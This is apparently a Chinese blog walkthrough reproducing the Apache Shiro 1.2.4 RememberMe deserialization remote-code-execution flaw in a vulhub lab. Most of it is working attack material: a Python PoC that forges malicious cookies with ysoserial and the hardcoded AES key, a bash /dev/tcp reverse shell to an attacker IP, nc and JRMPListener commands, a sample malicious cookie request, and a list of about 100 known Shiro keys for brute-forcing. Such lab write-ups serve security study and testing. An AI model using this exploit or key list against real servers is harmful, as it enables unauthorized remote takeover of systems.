Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

时间:2024-04-15 21:31:01

0x00 影响版本

Apache Shiro <= 1.2.4

0x01 产生原因

shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:
得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化
然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
payload 构造
前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie

0x02 靶场环境

docker pull vulhub/shiro

然后打开127.0.0.1:8080

0x03 漏洞复现

POC:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen([\'java\', \'-jar\', \'ysoserial-0.0.6-SNAPSHOT-all.jar\', \'JRMPClient\', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == \'__main__\':
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())

攻击机上执行脚本生成恶意cookie

python shiro_shell.py 1.1.1.1:1099     #1.1.1.1为你的攻击机ip  端口可以随意变动,但是后面监听的时候也要做相应变动

生成的cookie类似下图

反弹shell制作
反弹shell需要加密,网址:http://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell代码如下

bash -i >& /dev/tcp/1.1.1.1/7878 0>&1             #1.1.1.1为攻击机ip

攻击机监听端口
攻击机1.1.1.1上打开两个窗口,
其中一个窗口监听shell

nc -lvp 7878

另一个窗口监听JRMP端口

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 \'加密后的反弹shell\'

将生成的恶意cookie通过httpie发送
在攻击机1.1.1.1上执行如下代码

http 1.1.1.2:8080/login \'Cookie:rememberMe=UfsKYXK1SIOgFdnOxdPidh09yGZv6Medaj/T0E5sE9xhxMP69kzlNKsEdfHUhTgD12ea7NOv+xRhnZSGhUi9rz1tYVPu5QHfINrMS4I+lTe82RO5PY1vJrmMwP/NnBvjfGtTWTwRSNl1AhNgJrAhrEBStf+cpnBMwmoWxiexDjm2BavY/lSLe52hZhCEcr0zv/kqC9PdhBfY326+ux/RkE0pfwfZNMEUrPIZw8gBJkCIDTb1qj+W32+YinOKCkye/i+GmKHifPoMSt91q0nR/NQnxyu4UJQoULSbCI3/vXKtGm7P+YNqhH6smVPIoTxqtAqWTJG7eOafDPC2azUlhbLcmjql7qDL2wPpv4JOxB0fLIwdkQqSn9DCBty2BfKDqf8I/lvTbKqHHfVIUMdjYQ==\'

查看攻击机上监听的结果
发现两个端口都会收到消息


shell反弹到7878端口

常用的100个key

4AvVhmFLUs0KTA3Kprsdag==
3AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
2AvVhdsgUs0FSA3SDFAdag==
wGiHplamyXlVB11UXWol8g==
kPH+bIxk5D2deZiIxcaaaA==
fCq+/xW488hMTCD+cmJ3aQ==
1QWLxg+NYmxraMoxAXu/Iw==
ZUdsaGJuSmxibVI2ZHc9PQ==
L7RioUULEFhRyxM7a2R/Yg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
r0e3c16IdVkouZgk1TKVMg==
ZWvohmPdUsAWT3=KpPqda
5aaC5qKm5oqA5pyvAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
LEGEND-CAMPUS-CIPHERKEY==
bWljcm9zAAAAAAAAAAAAAA==
1AvVhdsgUs0FSA3SDFAdag==
5RC7uBZLkByfFfJm22q/Zw==
3AvVhdAgUs0FSA4SDFAdBg==
a3dvbmcAAAAAAAAAAAAAAA==
eXNmAAAAAAAAAAAAAAAAAA==
U0hGX2d1bnMAAAAAAAAAAA==
Ymx1ZXdoYWxlAAAAAAAAAA==
UGlzMjAxNiVLeUVlXiEjLw==
7AvVhmFLUs0KTA3Kprsdag==
MTIzNDU2Nzg5MGFiY2RlZg==
OY//C4rhfwNxCQAQCrQQ1Q==
FP7qKJzdJOGkzoQzo2wTmA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
MDgBSEFqYIoWYezkWDywig==
0Av6jWaXCkCu5A9nJbPxLI==
fPimdozRt+SSSbZS8/HARA==
U3ByaW5nQmxhZGUAAAAAAA==
0AvVhmFLUs0KTA3Kprsdag==
25BsmdYwjnfcWmnhAciDDg==
3JvYhmBLUs0ETA5Kprsdag==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
cmVtZW1iZXJNZQAAAAAAAA==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
aU1pcmFjbGVpTWlyYWNsZQ==
bXRvbnMAAAAAAAAAAAAAAA==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==